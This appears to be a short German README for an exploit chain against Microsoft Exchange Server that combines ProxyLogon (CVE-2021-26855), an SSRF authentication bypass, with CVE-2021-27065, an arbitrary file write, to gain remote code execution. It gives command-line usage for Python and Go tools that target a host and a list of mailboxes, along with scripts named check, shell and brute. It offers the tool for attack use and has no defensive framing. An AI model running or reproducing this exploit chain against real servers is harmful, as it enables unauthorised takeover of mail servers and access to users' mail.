
Exploit-Kette für CVE-2021-26855 und CVE-2021-27065, die Microsoft Exchange Server angreift und über SSRF und beliebiges Dateischreiben Authentifizierungsumgehung und Remote-Codeausführung ermöglicht.
ProxyLogon ist der formale generische Name für CVE-2021-26855, eine Sicherheitslücke in Microsoft Exchange Server, die es einem Angreifer ermöglicht, die Authentifizierung zu umgehen und sich als Admin auszugeben. Wir haben diesen Fehler zudem mit einer weiteren post-auth-Schwachstelle für beliebiges Datei-Schreiben, CVE-2021-27065, verknüpft, um Codeausführung zu erlangen.
usage:
sudo python3 proxylogon.py --host=target.com [email protected]
sudo python3 proxylogon.py --host=target.com --mails=./mails.txt
usage:
go run proxylogon.go -u target.com -e [email protected]
sudo python2 /manual/check.py
sudo python2 /manual/shell.py
sudo python2 /manual/brute.py